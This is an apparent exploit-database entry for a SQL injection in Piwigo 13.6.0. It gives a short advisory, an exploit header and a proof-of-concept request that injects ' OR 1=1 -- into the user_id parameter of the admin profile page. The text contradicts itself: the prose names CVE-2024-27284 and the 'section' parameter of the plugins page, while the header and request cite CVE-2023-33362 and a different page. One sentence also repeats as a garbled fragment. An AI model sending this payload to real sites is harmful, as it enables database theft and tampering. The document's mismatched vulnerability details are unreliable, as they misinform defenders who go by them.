Piwigo 13.6.0 SQL Injection

Piwigo 13.6.0 was vulnerable to a SQL Injection (CVE-2024-27284).

This flaw Piwigo 13.6.0 was vulnerable to a SQL Injection (CVE-2024-27284).

This flaw allowed authenticated administrators to inject malicious SQL queries. The vulnerability resided in the `section` parameter of `admin.php?page=plugins` when managing extensions.

By manipulating this parameter, an attacker could extract sensitive database information, modify data, or potentially achieve further system compromise. While requiring admin privileges limits unauthenticated exploitation, it poses a significant risk if an admin account is compromised.

Users should upgrade to Piwigo 13.7.0 or newer to patch this issue.

# Exploit Title: Piwigo 13.6.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/Piwigo/Piwigo
# Software Link: https://github.com/Piwigo/Piwigo
# Version: 13.6.0
# Tested on: Windows
# CVE : CVE-2023-33362


Proof Of Concept:
GET /admin.php?page=profile&user_id=' OR 1=1 -- HTTP/1.1
Host: piwigo

Steps to Reproduce
Login as an admin user.
Send the request.
Observe the result